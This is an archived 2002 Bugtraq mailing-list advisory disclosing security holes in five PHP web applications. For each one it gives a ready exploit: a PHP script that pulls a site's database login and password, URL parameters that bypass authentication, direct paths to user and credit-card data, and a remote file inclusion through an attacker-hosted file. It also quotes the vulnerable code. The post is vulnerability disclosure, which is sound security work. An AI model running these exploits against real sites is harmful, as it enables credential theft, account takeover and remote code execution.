Home page logo
/

bugtraq logo Bugtraq mailing list archives

Multiple Web Security Holes
From: "Frog Man" <leseulfrog () hotmail com>
Date: Wed, 02 Oct 2002 19:22:15 +0200

I sent this three times to webappsec but without resultats.
I try so on bugtraq, although that is less appropriate.


-----------------------------------------------------
Five products in PHP are vulnerable to various holes.

1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3.0
Problem : BD informations disclosure
Exploit :
<?
$victime="http://[target]";;
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer : $DB_Database");
?>


2) PY-Membres
Website : http://py-scripts.levillage.org/
Tested Version : 3.1
Problem : Access to all accounts
Exploit :
http://[target]/index.php?pymembs=admin
http://[target]/index.php?pymembs=[USER]

Problem :
<?
if ($pymembs)
{
$login=$pymembs;
session_start();
session_register('login');
}
else { session_start(); }
[...]
if(!session_is_registered('login'))
{
?>
[...]

3) upb PB
Website : http://www.webrc.ca/
Tested Version : 1.0b
Problem : Informations disclosure
Exploit :
http://[target]/db/users.dat

4) MidiCart PHP
Website : http://www.midicart.com
Version : 1
Problems : Informations disclosure, Upload
Exploit :
http://{target}/admin/credit_card_info.php
http://{target}/admin/upload.php

5) Pphlogger
Website : http://www.phpee.com
Tested Versions : 2.0.9, 2.2.1, 2.2.2a
Problem : Include file
Exploit :
http://[target]/showhits.php3?rel_path=http://[attacker]
with
http://[attacker]/main_location.inc
or
http://[attacker]/config.inc.php3
or
http://[attacker]/get_userdata.php3

Problem :
if (!isset($rel_path)) $rel_path="";
include $rel_path."config.inc.php3";
include $rel_path."get_userdata.php3";



For more details & patchs :
In french :
http://www.frog-man.org/tutos/5holes10.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

-----------------------------------------------------

Sorry for my poor english.
frog-m () n



_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr


  By Date           By Thread  

Current thread:
  • Multiple Web Security Holes Frog Man (Oct 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]